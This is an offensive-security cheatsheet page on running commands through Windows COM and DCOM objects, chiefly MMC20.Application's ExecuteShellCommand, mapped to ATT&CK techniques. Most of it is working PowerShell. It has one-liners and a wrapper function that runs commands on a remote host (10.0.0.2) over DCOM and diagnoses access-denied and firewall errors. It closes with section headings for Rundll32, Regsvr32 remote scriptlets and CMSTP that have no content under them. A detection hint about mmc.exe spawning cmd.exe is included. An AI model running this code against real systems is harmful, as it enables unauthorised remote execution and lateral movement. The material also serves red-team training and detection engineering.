📜COM Execution - T1559.001

Templates and methods for quickly executing code through COM and DCOM objects

Windows Component Object Model quick execution cheatsheet

Powershell

Using PowerShell with .NET type notation ([type]::GetTypeFromCLSID / [type]::GetTypeFromProgID plus [System.Activator]::CreateInstance) to create a COM or DCOM instance from either a CLSID or a ProgID. The examples below use the MMC20.Application class (CLSID 49B2791A-B1AE-4C90-9B8E-E860BA07F889), whose ExecuteShellCommand method on the active view starts an arbitrary process; the COM server for this class is mmc.exe, so the launched command shows up as a child of mmc.exe.

Execution via CLSID

# Resolve the class by CLSID (no braces) and activate it in-process or out-of-process as registered
$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
# ExecuteShellCommand(Command, Directory, Parameters, WindowState); 7 = minimized, no focus
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

Execution via ProgID

# Same class, resolved through its versioned ProgID instead of the CLSID
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

DCOM Execution

Distributed COM is an extension of COM which, among other things, allows a COM object to be instantiated on a remote host over RPC (TCP 135 plus a dynamic port). The caller needs local administrator rights on the target. Note that DCOM can also be used locally by specifying the loopback interface (127.0.0.1) as the server name.

# Second argument is the server name; the class is activated on 10.0.0.2 (or 127.0.0.1 for loopback DCOM)
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
# The command runs on the remote host, as a child of mmc.exe there
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
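The one-liners in the COM and DCOM sections above, wrapped into reusable functions as an added example (this is not code from the original cheatsheet). It covers the three activation paths on this page (local COM, DCOM over loopback, DCOM to a remote host), lets you pick CLSID or ProgID resolution, first checks in the local registry that the ProgID and CLSID really map to the same class and which server binary COM will start, and translates the two COM errors you will most often hit. The host name 10.0.0.2, the output paths and the whoami payload are placeholders.

```powershell
# Added example, not from the original page. Host names, payload and output paths are placeholders.

function Get-Mmc20ClassInfo {
    # Confirms on the local box that the ProgID and CLSID used on this page are the same
    # class, and shows the out-of-process server (LocalServer32) COM will launch for it.
    param([string]$ProgId = "MMC20.Application.1")
    $clsid = (Get-ItemProperty "Registry::HKEY_CLASSES_ROOT\$ProgId\CLSID" -ErrorAction Stop).'(default)'
    $key   = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid"
    [pscustomobject]@{
        ProgId        = $ProgId
        Clsid         = $clsid
        ReverseProgId = (Get-ItemProperty "$key\ProgID" -ErrorAction Stop).'(default)'
        LocalServer32 = (Get-ItemProperty "$key\LocalServer32" -ErrorAction SilentlyContinue).'(default)'
    }
}

function Invoke-Mmc20ShellCommand {
    param(
        [Parameter(Mandatory)][string]$Parameters,   # e.g. '/c whoami > C:\fromdcom.txt'
        [string]$Command = "cmd",
        [string]$ComputerName,                       # omit = plain COM; "127.0.0.1" = DCOM over loopback
        [switch]$UseClsid,                           # resolve by CLSID instead of ProgID
        [int]$WindowState = 7                        # 7 = minimized, no focus (the page passes the string "7")
    )
    $progId = "MMC20.Application.1"
    $clsid  = [guid]"49B2791A-B1AE-4C90-9B8E-E860BA07F889"

    # GetTypeFromCLSID / GetTypeFromProgID accept an optional server name; with it the
    # activation goes through DCOM instead of the local class table.
    $type = if ($ComputerName) {
        if ($UseClsid) { [type]::GetTypeFromCLSID($clsid, $ComputerName) }
        else           { [type]::GetTypeFromProgID($progId, $ComputerName) }
    } else {
        if ($UseClsid) { [type]::GetTypeFromCLSID($clsid) }
        else           { [type]::GetTypeFromProgID($progId) }
    }
    if (-not $type) { throw "Could not resolve $progId / $clsid (server: '$ComputerName')" }

    $app = $null
    try {
        $app = [System.Activator]::CreateInstance($type)
        # Same call as the one-liners on this page; the COM server (mmc.exe) spawns $Command.
        $app.Document.ActiveView.ExecuteShellCommand($Command, $null, $Parameters, $WindowState)
    } catch {
        # PowerShell wraps the COMException; walk to the innermost exception for the HRESULT.
        $ex = $_.Exception
        while ($ex.InnerException) { $ex = $ex.InnerException }
        switch ('{0:X8}' -f $ex.HResult) {
            '800706BA' { throw "RPC server unavailable: host down, DCOM disabled, or TCP 135 / dynamic RPC ports filtered" }
            '80070005' { throw "Access denied: caller is not a local admin on the target, or a non-built-in local admin filtered by remote UAC (LocalAccountTokenFilterPolicy)" }
            default    { throw $ex }
        }
    } finally {
        # Release the proxy so mmc.exe on the target can exit instead of lingering.
        if ($app) { [void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) }
    }
}

# Usage (placeholders): registry check, then local COM, loopback DCOM and remote DCOM.
Get-Mmc20ClassInfo
Invoke-Mmc20ShellCommand -Parameters '/c whoami > C:\fromcom.txt'
Invoke-Mmc20ShellCommand -Parameters '/c whoami > C:\fromdcom.txt' -ComputerName 127.0.0.1 -UseClsid
Invoke-Mmc20ShellCommand -Parameters '/c whoami > C:\fromdcom.txt' -ComputerName 10.0.0.2
```

Get-Mmc20ClassInfo should report that MMC20.Application.1 resolves to {49B2791A-B1AE-4C90-9B8E-E860BA07F889} and that its LocalServer32 is mmc.exe; that is also the detection angle for this technique: on the machine where the object is activated, mmc.exe is started by the DcomLaunch service with -Embedding on its command line and then spawns cmd.exe, a parent/child pair that normal console use never produces.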

Rundll32

Execution via CLSID

Execution via ProgID

Execution via shell32.dll

Scriptlet Execution from Remote Server

Remote Scriptlet via INF file

Regsvr32

COM Local Scriptlet Execution

COM Scriptlet Execution from Remote Server

CMSTP

Execution via INF file that downloads and executes a scriptlet (sct)

Credit to @Amr_Thabet for the INF code

PyCOM

Verclsid

Execution via CLSID

Xwizard

Execution via CLSID

ATT&CK Techniques in this Page

  • Command and Scripting Interpreter: PowerShell - T1059.001

  • Inter-Process Communication: Component Object Model - T1559.001

  • System Binary Proxy Execution: CMSTP - T1218.003

  • System Binary Proxy Execution: Rundll32 - T1218.011

  • System Binary Proxy Execution: Verclsid - T1218.012

  • System Binary Proxy Execution: Regsvr32 - T1218.010
